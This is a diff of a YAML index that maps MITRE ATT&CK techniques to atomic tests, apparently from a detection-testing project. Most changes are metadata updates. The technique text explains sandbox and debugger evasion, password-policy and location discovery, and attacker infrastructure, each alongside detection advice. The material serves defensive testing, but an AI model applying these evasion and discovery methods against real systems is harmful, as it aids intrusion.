-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -61692,6 +62348,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -61702,9 +62361,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -61714,12 +62378,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -61762,7 +62453,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests:
     - name: Permission Groups Discovery (Local)
@@ -61784,7 +62474,7 @@ discovery:
         name: sh
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -61795,28 +62485,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -61849,9 +62542,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests:
     - name: Examine password complexity policy - Ubuntu
@@ -61978,7 +62670,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -62017,8 +62709,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests:
     - name: Discover System Language with locale
@@ -62106,7 +62796,7 @@ discovery:
         name: sh
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -62147,87 +62837,85 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests: []
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests:
     - name: Get geolocation info through IP-Lookup services using curl freebsd, linux
@@ -62302,7 +62990,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests:
     - name: Security Software Discovery - ps (Linux)
@@ -62331,12 +63018,12 @@ discovery:
         name: sh
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -62344,10 +63031,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -62356,15 +63045,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -62392,9 +63082,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests: []
   T1018:
@@ -62469,7 +63156,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests:
     - name: Remote System Discovery - arp nix
@@ -62672,7 +63358,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests:
     - name: Port Scan
@@ -62799,12 +63484,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests: []
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -62825,12 +63509,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -62855,7 +63538,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -62910,7 +63592,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -62930,7 +63612,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1124:
@@ -63033,7 +63714,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests:
     - name: System Time Discovery in FreeBSD/macOS
@@ -63051,7 +63731,7 @@ discovery:
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -63062,7 +63742,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -63133,29 +63813,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -63179,15 +63858,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -63219,17 +63901,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -63282,11 +63963,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -63322,7 +64002,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -63371,43 +64051,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
